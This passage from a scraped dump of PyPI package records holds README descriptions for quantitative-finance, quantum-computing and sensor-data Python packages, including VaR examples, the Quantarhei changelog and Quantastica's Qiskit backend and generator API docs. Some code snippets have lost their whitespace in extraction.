portfoliosfromquant23rg.pricingGBMimportPricingGBM,PricingGBMPortfolioimportyfinanceasyfsp500=yf.Ticker(\"^GSPC\")hist_sp500=sp500.history(\"1y\")hist_sp500[\"returns\"]=hist_sp500.Close/hist_sp500.Close.shift(1)-1returns_serie=hist_sp500.dropna().returns#################################################### Pricing with Geometric Brownian Motion ###pricer=PricingGBM.create_pricing_GBM_from_time_series(hist_sp500.Close,nb_steps=100,maturity=1,returns=returns_serie,nb_simulations=1000,)pricer.simulate_and_see()Value at Risk & Conditional Value at Risk (work in progress for portfolio)### Value at Risk (one asset) ###fromquant23rg.riskManagementimportRiskManagementOneAssetrkManageHistoric=RiskManagementOneAsset(returns_serie,input_type=\"returns\")rkManageNormal=RiskManagementOneAsset(returns_serie,mode=\"normal\",)rkManageMonteCarlo=RiskManagementOneAsset(hist_sp500.Close,\"Monte-Carlo\",returns=returns_serie,input_type=\"value\")print(f\"VaR Historic 1 day :{rkManageHistoric.value_at_risk(nb_past_days=len(returns_serie),confiance=.95,nb_days=1)}\")print(f\"VaR Normal 1 day :{rkManageNormal.value_at_risk(nb_past_days=len(returns_serie),confiance=.95,nb_days=1)}\")print(f\"VaR Monte-Carlo 1 day :{rkManageMonteCarlo.value_at_risk(nb_past_days=len(returns_serie),confiance=.95,nb_days=1)}\")print(f\"Cond-VaR Historic 1 day :{rkManageHistoric.conditional_value_at_risk(nb_past_days=len(returns_serie),confiance=.95,nb_days=1)}\")print(f\"Cond-VaR Normal 1 day :{rkManageNormal.conditional_value_at_risk(nb_past_days=len(returns_serie),confiance=.95,nb_days=1)}\")print(f\"Cond-VaR Monte-Carlo 1 day :{rkManageMonteCarlo.conditional_value_at_risk(nb_past_days=len(returns_serie),confiance=.95,nb_days=1)}\")#################################################### Value at Risk multiple assets (Cholesky) ###importyfinanceasyfimportnumpyasnpfromquant23rg.riskManagementimportRiskManagementPortfolio## Datas for the testsp500=yf.Ticker(\"^GSPC\")hist_sp500=sp500.history(\"1y\")aapl=yf.Ticker(\"AAPL\")hist_aapl=aapl.history(\"1y\")hist_sp500[\"returns\"]=hist_sp500.Close/hist_sp500.Close.shift(1)-1###############################@pf_risk_Test=RiskManagementPortfolio.init_and_instantiate_RK_PF(portfolio_time_series=np.array([hist_sp500.Close.tolist(),hist_aapl.Close.tolist(),]),interest_free_rate=0.05/252,mode=\"Monte-Carlo\",nb_days=1,input_type=\"value\",)print(\"Correlation matrix :\")print(pf_risk_Test.correlation_matrix)print(\"Value-at-risk 1 day\",pf_risk_Test.value_at_risk(nb_past_days=1,# not important hereconfiance=0.95,),)pf_risk_Test=RiskManagementPortfolio.init_and_instantiate_RK_PF(portfolio_time_series=np.array([hist_sp500.Close.tolist(),hist_aapl.Close.tolist(),]),interest_free_rate=0.05/252,mode=\"normal\",nb_days=1,input_type=\"value\",)print(\"Correlation matrix :\")print(pf_risk_Test.correlation_matrix)print(\"Value-at-risk 1 day\",pf_risk_Test.value_at_risk(nb_past_days=1,# not important hereconfiance=0.95,),)################################################"} +{"package": "quanta", "pacakge-description": "No description available on PyPI."} +{"package": "quantadex", "pacakge-description": "# Python Library for BitShares![](https://img.shields.io/pypi/v/bitshares.svg?style=for-the-badge)\n![](https://img.shields.io/github/release/bitshares/python-bitshares.svg?style=for-the-badge)\n![](https://img.shields.io/github/downloads/bitshares/python-bitshares/total.svg?style=for-the-badge)\n![](https://img.shields.io/pypi/pyversions/bitshares.svg?style=for-the-badge)\n![](https://img.shields.io/pypi/l/bitshares.svg?style=for-the-badge)\n![](https://cla-assistant.io/readme/badge/bitshares/python-bitshares)Stable[![docs master](https://readthedocs.org/projects/python-bitshares/badge/?version=latest)](http://python-bitshares.readthedocs.io/en/latest/)\n[![Travis master](https://travis-ci.org/bitshares/python-bitshares.png?branch=master)](https://travis-ci.org/bitshares/python-bitshares)\n[![codecov](https://codecov.io/gh/bitshares/python-bitshares/branch/master/graph/badge.svg)](https://codecov.io/gh/bitshares/python-bitshares)Develop[![docs develop](https://readthedocs.org/projects/python-bitshares/badge/?version=develop)](http://python-bitshares.readthedocs.io/en/develop/)\n[![Travis develop](https://travis-ci.org/bitshares/python-bitshares.png?branch=develop)](https://travis-ci.org/bitshares/python-bitshares)\n[![codecov develop](https://codecov.io/gh/bitshares/python-bitshares/branch/develop/graph/badge.svg)](https://codecov.io/gh/bitshares/python-bitshares)\u2014## DocumentationVisit the [pybitshares website](http://docs.pybitshares.com/en/latest/) for in depth documentation on this Python library.## Installation### Install with pip3:$ sudo apt-get install libffi-dev libssl-dev python-dev python3-dev python3-pip\n$ pip3 install bitshares### Manual installation:$ git clonehttps://github.com/bitshares/python-bitshares/$ cd python-bitshares\n$ python3 setup.py install \u2013user### Upgrade$ pip3 install \u2013user \u2013upgrade bitshares## Contributingpython-bitshares welcomes contributions from anyone and everyone. Please\nsee our [guidelines for contributing](CONTRIBUTING.md) and the [code of\nconduct](CODE_OF_CONDUCT.md).### Discussion and DevelopersDiscussions around development and use of this library can be found in a\n[dedicated Telegram Channel](https://t.me/pybitshares)### LicenseA copy of the license is available in the repository\u2019s\n[LICENSE](LICENSE.txt) file."} +{"package": "quantagonia-api-client", "pacakge-description": "Quantagonia API ClientThis package contains Quantagonia's CLI client and client-side APIs for using HybridSolver in the cloud.InstallationPython >= 3.8 is required. Then, dopython -m pip install quantagonia-api-clientIn order to use HybridSolver through Quantagonia's cloud system, you'll need to sign up for an API key and set it system-wide byexport QUANTAGONIA_API_KEY=Quick start: using the CLI clientThis package provides the scripthybridsolverto interact with the\ncloud solver. In order to solve a MIP (supported formats:.mps, .lp, .mps.gz, .lp.gz) or QUBO (spported formats:.qubo, .qubo.gz), just\nusehybridsolver solve path/to/example.mpswhich will automatically set all parameters and solver controls to their default value, which is a good compromise for many middle-sized\noptimization problems out there.Thesolvecall has a few options (tryhybridsolver solve --help) and will, after submitting the problem, stream the logs and output the\nsolution vector if one is found.To start a job without attaching to its log stream and leave it running in the background, usehybridsolver submit path/to/example.mpswhich supports the same parameters assolveand returns ajob_id.\nusing this ID, logs, results and job status as well as time billed can\nbe retrieved usinghybridsolver (logs | solution | status | time_billed) job_idLastly, in order to cancel a runnning job and avoid unnecessary\ncosts, usehybridsolver cancel job_id. To listkactive and/or past jobs,\nusehybridsolver list --n=k.Using the API client in your own codeThe capabilities of the API client include, but are not limited to:a plugin for PuLP to solve PuLP-generated models locally and in the client,a simple API to model QUBOs locally and solve them in the cloud andan importer to convert PyQUBO models into our format - allowing to solve PyQUBO models in QUantagonia's cloud.For starters, you can run the examples inexamples/through, e.g.,QUANTAGONIA_API_KEY=\"\" python examples/submit_qubo.pywith a valid Quantagonia API key.For more details, we refer to ourAPI reference."} +{"package": "quant-alchemy", "pacakge-description": "Table of contentsTable of contentsIntroductionInstallationDependenciesUsageContributingIntroductionQuant Alchemyprovide aInstallationThis package requires some dependencies to be installed.DependenciespandasnumpyscipyTo install the package, run the following command in your terminal.pipinstallquant_alchemyTo install all the dependencies, run the following command in your terminal.pipinstall-rrequirements.txtUsageA simple example of how to use the package is shown below.fromquant_alchemyimportTimeseries,Portfolio\"\"\"Suppose we have a dataframe with the following columns:- date: date of the stock price- close: opening price of the stock\"\"\"df=pd.read_csv(\"data/stock.csv\")# Create a timeseries objectts=Timeseries(df)# To see all the methods availableprint([tfortindir(ts)ifnott.startswith('__')])# To see how to use a methodhelp(ts.annualized_return)ContributingFor any bug reports or recommendations, please visit ourissue trackerand create a new issue. If you're reporting a bug, it would be great if you can provide a minimal reproducible example.Thank you for your contribution!"} +{"package": "quantamatics", "pacakge-description": "No description available on PyPI."} +{"package": "quantami", "pacakge-description": "No description available on PyPI."} +{"package": "quantan", "pacakge-description": "UNKNOWN"} +{"package": "quantanalysis", "pacakge-description": "testChange Log0.0.1 (15.05.2022)-First Release"} +{"package": "quant-analytics-flow", "pacakge-description": "No description available on PyPI."} +{"package": "quant-analytics-torch", "pacakge-description": "No description available on PyPI."} +{"package": "quantapp", "pacakge-description": "No description available on PyPI."} +{"package": "quantaq-cli", "pacakge-description": "QuantAQ Command Line Interface (CLI)This package provides easy-to-use tools to munge data associated with QuantAQ air quality sensors.DocumentationFull documentation can be foundhere.DependenciesThis tool is built for Python 3.6.1+ and has the following key dependenciespython = \">=3.8,<4.0\"\npandas = \">=1.0.4\"More details can be found in thepyproject.tomlfile at the base of this repository.InstallationInstall from PyPI$pipinstallquantaq-cliIt can also be added as a dependency using Poetry$poetryaddquantaq-cliIf you would like to install locally, you can clone the repository and install directly with Poetry$poetryinstallTestingAll tests are automagically run via GitHub actions and reports are uploaded directly to codecov. For results to these runs, click on the badges at the top of this file. In addition, you can run tests locally$poetryrunpytest--cov=./--cov-report=xml-rPDevelopmentDevelopment takes place on GitHub. Issues and bugs can be submitted and tracked via theGitHub Issue Trackerfor this repository.LicenseCopyright \u00a9 2020-2023 QuantAQ, Inc.Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License."} +{"package": "quantarhei", "pacakge-description": "QUANTArhei: Open Quantum System Theory for Molecular SystemsQuantarhei is a Molecular Open Quantum Systems Simulator written predominantly\nin Python. Its name is derived from the famous aphorism \u201cPanta rhei\u201d of the\nGreek philosopher Heraclitus of Ephesus. \u201cPanta rhei\u201d means \u201cEverything flows\u201d\nor \u201cEverything is in flux\u201d which is quite fitting when you change Panta into\nQuanta.In \u201cQuantarhei\u201d the last four letters (\u201crhei\u201d) should be written in Greek,\ni.e. (using LateX convention) \u201c\\rho \\epsilon \\iota\u201d.Quantarhei is in flux, but it already provides helper classes to define\nmolecules, their aggregates and their interaction with external environment.\nIt can calculate absorption spectra of individual molecules and their\naggregates and excitation energy transfer dynamics using various types\nof Redfield and Foerster theories.Quantarhei provides Python code (optimized with Numpy) for all its implemented\nmethods and theories, and allows extensions and replacements of the reference\nPython code with optimised routines written in C, Fortran or other lower level\nlanguages.In the first development stage, we concentrate on bringing to you tools\nto quickly build essential components of a quantum mechanical simulation,\nsuch as Hamiltonian, relaxation tensors, various initial\nconditions for density matrix etc.Quantarhei is at its experimental stage.\nCurrent version isQuantarhei is available in source form on GitHub and from PyPI for installation\nwith the pip command.AcknowledgementsThe work on Quantarhei is supported byNeuron Fund for Support of Sciencethrough the Impuls grant in physics 2014 (2015-2017)andCzech Science Foundation (GACR)through grants: 14-25752S (2014-2016), 17-22160S (2017-2019) and 18-18022S (2018-2020)New in 0.0.65for users:bug fixesNew in 0.0.64for users:use cases introduced for input filesbug fixesNew in 0.0.63for users:bug fixesNew in 0.0.62for users:_input_file_ variable defined in scripts run through qrhei run commandassert_version() function definedbug fixesNew in 0.0.61for users:bug fixesNew in 0.0.60for users:bug fixesNew in 0.0.59for users:bug fixesNew in 0.0.58for users:Many bug fixesNew in 0.0.57for users:Bug fixesNew in 0.0.56for users:Bug fixesNew in 0.0.55for users:A bug in 2D lineshapes of ESA calculated by MockTwoDSpectrumCalculator fixedOther bug fixesNew in 0.0.54for users:TwoDSpectra can be added if they are of the same typeBug fixesNew in 0.0.53for users:Improved handling of rotating wave approximation (RWA) for density matrix and the state vectorBug fixesNew in 0.0.52for users:Improved control over parallelization from command line byqrheioptionsParallelization over multiple nodsBug fixesNew in 0.0.51for users:Bug fixesNew in 0.0.50for users:Some improvement of theqrheidriverImproved logging capabilities; standard print function can be replaced printlog functionBug fixesNew in 0.0.49for users:Runnable .yaml configuration filesBetter diagnostics of errors occuring while running a script by qrhei driverNew qrhei subcommand file, which shows information about files saved by QuantarheiBug fixesfor developers:Started work on a script compiler qtaskNew in 0.0.48for users:Bug fixesNew in 0.0.47for users:Bug fixes2D spectra can be shifted in its axis by less then the frequency step (interpolated shift)New helper class Input to simplify configuration of user scripts by \u201c.yaml\u201d or \u201c.json\u201d filesNew in 0.0.46for users:A bug introduced in 0.0.45 in 2D spectrum calculations now fixedMost of the classes can now be copied (.copy() for a shallow copy, .deepcopy() for a deep, recursive copy)Improvements of 2D calculations with dressed statesVibronic example of 2D spectrum calculation extendedClass migration: TwoDSpectrum -> TwoDResponse; TwoDSpectrumContainer -> TwoDResponseContainerNew classes TwoDSpectrum and TwoDSpectrumContainer are simpler and contain only one type of spectraClass migration: MockTwoDSpectrum -> MocjDefinitions of positive and negative frequencies in omega2-frequency maps changed to correspond to literatureFor developers:many constants describing non-linear response, 2D spectra and data are defined on the highest quantarhei import levelAll Saveable objects now have a convenience methods copy() for shallow copying, deepcopy() for deep copying and scopy() for a deep copy by saving to and loading the object from a temporary fileNew in 0.0.45For users:Improved ability to calculate and analyze 2D frequency mapsget_Fourier_transform method of DFunction accepts a windowing function, which works the same as the one of TwoDSpectrumContainerCalculation of effective lineshape pump-probe spectraSaving of TwoDSpectrum data into text files (.dat, .txt), numpy formats (.npy, .npz) and Matlab files (.mat) is enabledProblem which caused Redfield and Lindblad operators not to transform to correct basis when represented by operators was fixedProblem which caused Liouville pathways to be calculated with site basis evolution superoperator was fixedoperator_factory class of Harmonic oscillator now fixed to return correct shift operator for complex inputsoperator_factory is now available from quantarhei.models.HarmonicOscillator packageSome small bug fixesFor developers:Failing documentation compilation fixed and adjusted to new version of matplotlibNew in 0.0.44For users:Basic implementation of HEOMSome bug fixesNew in 0.0.43For users:PureDephasing super-operator to allow additional pure dephasing for realistic lineshapes in effective lineshape description of time-resolved experimentsEmpty relaxation superopetator (as an empty Lindblad form) introduced (as a temporary fix to allow pure dephasing dynamics only)Consistent calculation of pure dephasing of non-optical coherence elements of the density matrix from effective lineshape theory (including electronic only dephasing in vibrational-electronic systems)Some bug fixesNew in 0.0.42For users:Improved effective lineshapes for 2D spectrum calculationsCalculation of absorption spectrum using first order Liouville pathwaysSome bug fixes including an frequency factor in absorption spectrumNew in 0.0.41For users:Some bug fixesBetter Louville pathway manipulation featuresNew in 0.0.40For users:Some bug fixesMinor new featuresNew in 0.0.39For users:Some bug fixesNew in 0.0.38For users:Some bug fixesNew in 0.0.37For users:Some bug fixesFor developersSome unused files removedMore precise dependencies on other packages specified in setupNew in 0.0.36For users:Quantarhei now available also as a conda packageRecommended installation procedure documentedTwoDSpectrum class revised - new method names, better storage model (keeps track of rephasing and non-rephasing part, groups of pathways associated with different processes when required, stores different pathways separately when required)Improved TwoDSpectrumContainer (can hold a group of spectra identified by an arbitrary ValueAxis (most notably TimeAxis and FrequencyAxis), integer index or list of strings). Copies the new storage improvement on TwoDSpectrum.labsetup class changed to LabSetup and extended by information about pulse profiles and spectra. labsetup is left as deprecated for compatibilityFourier transform of 2D spectra in t2, via TwoDSpectrumContainer; also enables FFT with window functionFunctions of ValueAxis introduced in a special module; Tukey window function for FFT in waiting time is one of themSuperOperator is BasisManaged; basis management is solved for both time-dependent and time-independent super operatorsRelaxationTensor now inherits from SuperOperator and it is BasisManaged through that inheritanceEvolutionSuperOperator tested, documented and it is BasisManagedEvolutionSuperOperator\u2019s method apply() can be applied with time argument which is of type TimeAxis type, float or array of floats; returns DensityMatrix or DensityMatrixEvolutionQuantarhei driver qrhei changes format: use \u2018qrhei run scriptname\u2019 to run scripts and consult the -h option of \u2018qrhei run\u2019; parallel runs untested in this versionDocumentation contains a description of the concept of \u201cuser\u201d, \u201cadvanced\u201d, and \u201cexpert\u201d levels of classes in Quantarhei.List of classes completely covered by documentation and doctests included in on-line documentationClasses Mode, SubMode, Molecule, TwoDSpectrumContainer completely documentedDocumentation enhancedCountless small improvements and bug fixesFor developers:Code of conduct file now in the root directory of the packageAbsorption spectroscopy related classes now organized in one file per class fashion so that automatic documentation is easier to readNew subpackage quantarhei.testing united all custom functions that support testing. It includes feature.py module previously found in quantarhei.dev subpacked (now removed) and a behave.py module which supports tests with behave packageBehave package is now used for some tests (in particular for tests of the \u201cqrhei\u201d driver). Future acceptance tests should preferentially be written with this packageNew helper script \u201cghenerate\u201d autogenerates Python step files for tests with \u2018behave\u2019 package from the Gherkin feature filesNew in 0.0.35For users:Method get_DensityMatrix() of the Aggregate class improved. It accepts some new options which makes specification of desired density matrix more flexibleExperimental implementation of circular and linear dichroisms and fluorescence spectraDocumentation is now available on readthedocs.org. A badgewhich informations about the status of automatic documentation builds was added to READMEMany small improvements and bug fixesFor developers:The code is now hosted on travis-ci.com and the builds are tested after every commit. Corresponding badgehas been added to READMEThe code is now hosted on codecov.com and its coverage by tests is measured. Corresponding badge showing the coveragehas beed added to READMENew in 0.0.34For usersSome issues with addition of bath correlation functions was fixedFirst entry in a database of literature bath correlation functions was created: the vibrational part of the FMO spectral density from Wendling et al., (2004)Aggregate can return a matrix of Franck-Condon factors (get_FC_factor_matrix())Aggregate can transform excited state site-basis shifted vibrational representation of an arbitrary operator to the unshifted (ground state) one (transform_2_unshifted(A, inverse=True/False) )Several new tested examplesRelaxationTensors (Redfield, Foerster, Lindblad, etc.) can now be multiplied by a constant or added (addition only if they are in tensor, i. e. not in operator, form)Tested examples can be fetched into IPython notebook or Python/IPython console by %example magic command or fetch_example function from quantarhei.wizard.magic moduleSmall improvements and bug fixesNew in 0.0.33For users:Evolution superoperators for relaxation tensors with constant coefficients (EvolutionSuperOperator class)Liouville pathway analysis including relaxation pathways (in Aggregate class)Small improvements and bug fixesFor developers:Aggregate class is broken into smaller pieces which snowball the functionality. Basic class is AggregateBase; new functions of this powerful class are defined in separate child classes. Aggregate class inherits from the whole chain of classesquantarhei.REAL and quantarhei.COMPLEX types should be now used for numpy arrays throughout the package. These types can be controlled and with it the used numerical precision and memory needsNew in 0.0.32For users:Electronic Lindblad form for vibronic Frenkel exciton modelPropagation with relaxation tensor (in particular Redfield and Time-dependent Redfield) in operator representation (where applicable it is much faster than with the tensorial representation)Redfield tensor and Time-dependent Redfield tensor can be calculated for a model with arbitrary number of vibrational statesAggregate can vibrationally trace arbitrary operator defined on its Hilbert spaceSmall improvements and bug fixesNew in version 0.0.31For users:Arbitrary time independent Lindblad formquantarhei.wizard module which contains IPython magic commands and some helpful Python console commandsSimulation templates which can be fetched into IPython notebooks or console by %template magic command (IPython) or fetch_template (console and IPython)Part of the test suit available for installed Quantarhei packageSome small improvements and bug fixesFor developers:Makefile is back in the package root directoryexamples directory depleted in favor of quantarhei/wizard/examples directoryNew tests under quantarhei/tests directory (mostly unit tests which contain plots)pytest required to run newtests with matplotlib plots"} +{"package": "quantasf", "pacakge-description": "QuantASFA Python package for computing chinese financial factors.Free software: MIT licenseDocumentation:https://quantasf.readthedocs.io.FeaturesTODOCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.0.1 (2018-04-19)First release on PyPI."} +{"package": "quantastica-qconvert", "pacakge-description": "Quantum programming language converterConvert between quantum programming languagesMore goodies athttps://quantastica.comSupported languagesPython version ofquantastica-qconvertcurrently supports only:Qobj to pyQuilQobj to QubitToasterMore formats will be added soon.Until then, for more formats see:JavaScript version as command line tool:https://www.npmjs.com/package/q-convertJavaScript version as online web page:https://quantum-circuit.com/qconvertUsagefromquantasticaimportqconvertsource_code=...options={}converted=qconvert.convert(qconvert.Format.QOBJ,source_code,qconvert.Format.PYQUIL,options)print(converted)Detailsconvert(source_format, source_dict, dest_format, options)source_formatFormat.QOBJdest_formatFormat.PYQUILFormat.TOASTERoptionsDict:For all destination formats:all_experimentsFalse(default) only first experiment will be converted and returned as stringTrueall experiments form Qobj will be converted and returned as list of strings.create_exec_codeTrue(default) generated source code will contain command which executes circuit e.g.qc.run()shots(integer) ifcreate_exec_codeisTruethen generated code will performshotsnumber of samplesForPYQUILdestination:latticename of the backend (e.g. for pyQuil destination\"Aspen-7-28Q-A\").If ommited then \"Nq-qvm\" will be generated whereNis number fo qubits in the circuit.Special values:\"qasm_simulator\"will produce \"Nq-qvm\" backend\"statevector_simulator\"will produce WaveFunction simulator codeas_qvm(defaultFalse) ifTrueQVM will mimic QPU specified by lattice argument.ForTOASTERdestination:No options yetThat's it. Enjoy! :)"} +{"package": "quantastica-qiskit-forest", "pacakge-description": "Forest backend for QiskitAllows runningQiskitcode onRigettisimulators and quantum computers by changing only two lines of your Qiskit code.More goodies athttps://quantastica.comInstallpip install quantastica-qiskit-forestUsageImportForestBackendinto your Qiskit code:from quantastica.qiskit_forest import ForestBackendAnd replaceAer.get_backendwithForestBackend.get_backend.ExamplefromqiskitimportQuantumRegister,ClassicalRegisterfromqiskitimportQuantumCircuit,execute,Aer# Import ForestBackend:fromquantastica.qiskit_forestimportForestBackendqc=QuantumCircuit()q=QuantumRegister(2,\"q\")c=ClassicalRegister(2,\"c\")qc.add_register(q)qc.add_register(c)qc.h(q[0])qc.cx(q[0],q[1])qc.measure(q[0],c[0])qc.measure(q[1],c[1])# Instead:#backend = Aer.get_backend(\"qasm_simulator\")# Use:backend=ForestBackend.get_backend(\"qasm_simulator\")# OR:# backend = ForestBackend.get_backend(\"statevector_simulator\")# backend = ForestBackend.get_backend(\"Aspen-7-28Q-A\")# backend = ForestBackend.get_backend(\"Aspen-7-28Q-A\", as_qvm=True)# ...# To speed things up a little bit qiskit's optimization can be disabled# by setting optimization_level to 0 like following:# job = execute(qc, backend=backend, optimization_level=0)job=execute(qc,backend=backend)job_result=job.result()print(job_result.get_counts(qc))PrerequisitesRunning on your local Rigetti simulatorYou need to installRigetti Forest SDKand make sure thatquilccompiler andqvmsimulator are running:Open new terminal and run:quilc -SAnd in one more new terminal run:qvm -S -cRunning on Rigetti quantum computerYou need to get access to RigettiQuantum Cloud Services(QCS)In your Quantum Machine Image (QMI) install this package and QiskitReserve aQPU latticeRun your code via QMI terminal or Jupyter notebook served by your QMIDetailsSyntaxForestBackend.get_backend(backend_name = None, as_qvm = False)Argumentsbackend_namecan be:any valid Rigetti lattice nameOR:qasm_simulatorwill be sent to QVM asNq-qvm(whereNis number of qubits in the circuit)statevector_simulatorwill be executed asWavefunctionSimulator.wavefunction()If backend name is not provided then it will act asqasm_simulatoras_qvmboolean:False(default)True: if backend_name is QPU lattice name, then code will execute on QVM which will mimic QPUThat's it. Enjoy! :)"} +{"package": "quantastica-qiskit-toaster", "pacakge-description": "Qubit Toaster backend for QiskitAllows running Qiskit code onQubit Toaster- a high performance quantum circuit simulator.Installpip install quantastica-qiskit-toasterUsageYou need to install and runQubit Toasterfirst. By default, this library expects Toaster running in server mode.Now import ToasterBackend into your Qiskit code:from quantastica.qiskit_toaster import ToasterBackendReplaceAer.get_backendwithToasterBackend.get_backend.ExamplefromqiskitimportQuantumRegister,ClassicalRegisterfromqiskitimportQuantumCircuit,execute# Instead:#from qiskit import Aer# Do:fromquantastica.qiskit_toasterimportToasterBackendqc=QuantumCircuit()q=QuantumRegister(2,\"q\")c=ClassicalRegister(2,\"c\")qc.add_register(q)qc.add_register(c)qc.h(q[0])qc.cx(q[0],q[1])qc.measure(q[0],c[0])qc.measure(q[1],c[1])# Instead:#backend = Aer.get_backend(\"qasm_simulator\")# Use:backend=ToasterBackend.get_backend(\"qasm_simulator\")# OR (to use statevector_simulator backend):# backend = ToasterBackend.get_backend(\"statevector_simulator\")# OR (to specify custom toaster_host and toaster_port params# default values are 127.0.0.1 and 8001 respectively):# backend = ToasterBackend.get_backend(# \"statevector_simulator\",# toaster_host=\"192.168.1.2\",# toaster_port=8888,# )# OR (to use it directly via CLI instead of HTTP API)# backend = ToasterBackend.get_backend(# \"qasm_simulator\",# use_cli=True)job=execute(qc,backend=backend)# To speed things up a little bit qiskit's optimization can be disabled# by setting optimization_level to 0 like following:# job = execute(qc, backend=backend, optimization_level=0)## To pass different optimization level to qubit-toaster use backend_options:# options = { \"toaster_optimization\": 3 }# job = execute(qc, backend=backend, backend_options=options)job_result=job.result()print(job_result.get_counts(qc))DetailsSyntaxToasterBackend.get_backend( backend_name = None,\n toaster_host=None, \n toaster_port=None, \n use_cli=False)Argumentsbackend_namecan be:qasm_simulatoronly counts will be returned (default)statevector_simulatorboth counts and state vector will be returnedIf backend name is not provided then it will act asqasm_simulatortoaster_host- ip address of machine runningqubit-toastersimulator (default: 127.0.0.1)toaster_port- port thatqubit-toasteris listening on (default: 8001)use_cli- if this param is set toTruethequbit-toasterwill be used directly (by invoking it as executable) instead via HTTP API. For this to work thequbit-toasterbinary must be available somewhere in system PATHToaster's backend_optionstoaster_optimization- integer from 0 to 70 - automatic optimization1 - optimization is off2..7 - optimization is on. 7 is highest optimization level.Running unit testsFirst startqubit-toasterin HTTP API mode:qubit-toaster -SRunning standard set of tests (excluding the slow ones):python -m unittest -vRunning all tests (including the slow ones):SLOW=1 python -m unittest -vSpecifying different toaster host/port:TOASTER_HOST=192.168.1.2 TOASTER_PORT=8001 python -m unittest -v -fRunning tests by using CLI interface instead of HTTP:USE_CLI=1 python -m unittest -v -fFind more goodies athttps://quantastica.comThat's it. Enjoy! :)"} +{"package": "quantastica-qps-api", "pacakge-description": "Quantum Programming Studio APIPython wrapper forQuantum Programming StudioHTTP API.Quick start1. Install QPS API package:pipinstallquantastica-qps-api2. Find your QPS API token:Loginto Quantum Programming Studio, go toProfile -> API Accessand copy your API token.3. Configure QPS API package with your API token:fromquantastica.qps_apiimportQPSQPS.save_account(\"YOUR_API_TOKEN\")That will create a local configuration file where your API token will be stored for future use.Now you are ready to use QPS API.Quick start example:find circuit from initial/final vector pairs using Quantum Algorithm Generatorfromquantastica.qps_apiimportQPSvector_pairs=[[[1,0,0,0],[0.5+0j,0.5+0j,0.5+0j,0.5+0j]],[[0,1,0,0],[0.5+0j,0+0.5j,-0.5+0j,0-0.5j]],[[0,0,1,0],[0.5+0j,-0.5+0j,0.5+0j,-0.5+0j]],[[0,0,0,1],[0.5+0j,0-0.5j,-0.5+0j,0+0.5j]]]job_id=QPS.generator.circuit_from_vectors(vector_pairs,settings={\"instruction_set\":[\"h\",\"cu1\",\"swap\"]})job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):print(job_output[\"message\"])else:forcircuitinjob_output[\"circuits\"]:print(circuit[\"qasm\"])Account managementQPS.save_account(api_token, api_url=None)Run this onceto setup your QPS REST API account. Method will create configuration file and your api token will be stored there for future use.If needed, you can clear your token by runningQPS.save_account(\"\")(or by deleting a configuration file).Ifapi_urlis not provided thenhttps://quantum-circuit.com/api/will be set as default.QPS.config_path()You can get config file path by runningQPS.config_path().Default configuration file path:On Unix, directory is obtained from environment variable HOME if it is set; otherwise the current user\u2019s home directory is looked up in the password directory through the built-in module pwd.On Windows, USERPROFILE will be used if set, otherwise a combination of HOMEPATH and HOMEDRIVE will be used.Quantum Algorithm Generator APIQuantum Algorithm Generatoris a tool based on machine learning which reverse engineers quantum circuits from state vectors (wave functions). Additionally, it can be used to find quantum algorithm for boolean function from truth table, to transpile circuits and to decompose unitary matrices.Generator job managementProblem sent to generator is called a \"job\". Each job has unique ID. As generator is resource intensive tool, it is configured to execute only one job at a time. While generator is solving a job, other jobs are queued. When generator finishes executing a job, it takes the next one from the queue.API provides functions for job manipulation: you can list all jobs (filtered by status), stop running job, cancel queued jobs, stop/cancel all jobs, start previously canceled (draft) job, etc.QPS.generator.list_jobs(status_filter=None)List all jobs, optionally filtered by status.status_filterString, optional. Can be:draft,queued,running,error,done.Example 1- list all (unfiltered) generator jobs:fromquantastica.qps_apiimportQPSjobs=QPS.generator.list_jobs()print(jobs)Example output:{\n\t\"list\": [\n\t\t{ \"_id\": \"r9LskFoLPQW5w7HTp\", \"name\": \"Bell state\", \"type\": \"vectors\", \"status\": \"done\" },\n\t\t{ \"_id\": \"R8tJH7XoZ233oTREy\", \"name\": \"4Q Gauss\", \"type\": \"vectors\", \"status\": \"queued\" },\n\t\t{ \"_id\": \"h7fzYbFz8MJvkNhiX\", \"name\": \"Challenge\", \"type\": \"unitary\", \"status\": \"draft\" },\n\t\t{ \"_id\": \"PC5PNXiGqhh2HmkX8\", \"name\": \"Experiment\", \"type\": \"vectors\", \"status\": \"error\"},\n\t\t{ \"_id\": \"SNhiCqSCT2WwRWKCd\", \"name\": \"Decompose\", \"type\": \"unitary\", \"status\": \"running\" }\n\t]\n}Example 2- listrunningjobs:fromquantastica.qps_apiimportQPSjobs=QPS.generator.list_jobs(status_filter=\"running\")print(jobs)Example output:{\n\t\"list\": [\n\t\t{ \"_id\": \"SNhiCqSCT2WwRWKCd\", \"name\": \"Decompose\", \"type\": \"unitary\", \"status\": \"running\" }\n\t]\n}QPS.generator.job_status(job_id)Get job status.Example:fromquantastica.qps_apiimportQPSstatus=QPS.generator.job_status(\"PC5PNXiGqhh2HmkX8\")print(status)Example output:{ \"_id\": \"PC5PNXiGqhh2HmkX8\", \"name\": \"Experiment\", \"type\": \"vectors\", \"status\": \"error\", \"message\": \"connect ECONNREFUSED\" }QPS.generator.get_job(job_id, wait=True)Get generator job referenced by ID. Ifwaitargument isTrue(default), then function will wait for a job to finish (or fail) before returning. IfwaitisFalse, then job will be immediatelly returned even if it is still running (in which case it will not contain a solution).Example:fromquantastica.qps_apiimportQPSjob=QPS.generator.get_job(\"r9LskFoLPQW5w7HTp\")print(job)Example output:{\n\t\"_id\": \"r9LskFoLPQW5w7HTp\",\n\t\"name\": \"Bell\",\n\t\"type\": \"vectors\",\n\t\"source\": {\n\t\t\"vectors\": {\n\t\t\t\"text1\": \"[ 1, 0, 0, 0 ]\",\n\t\t\t\"text2\": \"[ 1/sqrt(2), 0, 0, 1/sqrt(2) ]\",\n\t\t\t\"endianness1\": \"little\",\n\t\t\t\"endianness2\": \"little\"\n\t\t}\n\t},\n\t\"problem\": [\n\t\t{\n\t\t\t\"input\": [ 1, 0, 0, 0 ],\n\t\t\t\"output\": [ 0.7071067811865475, 0, 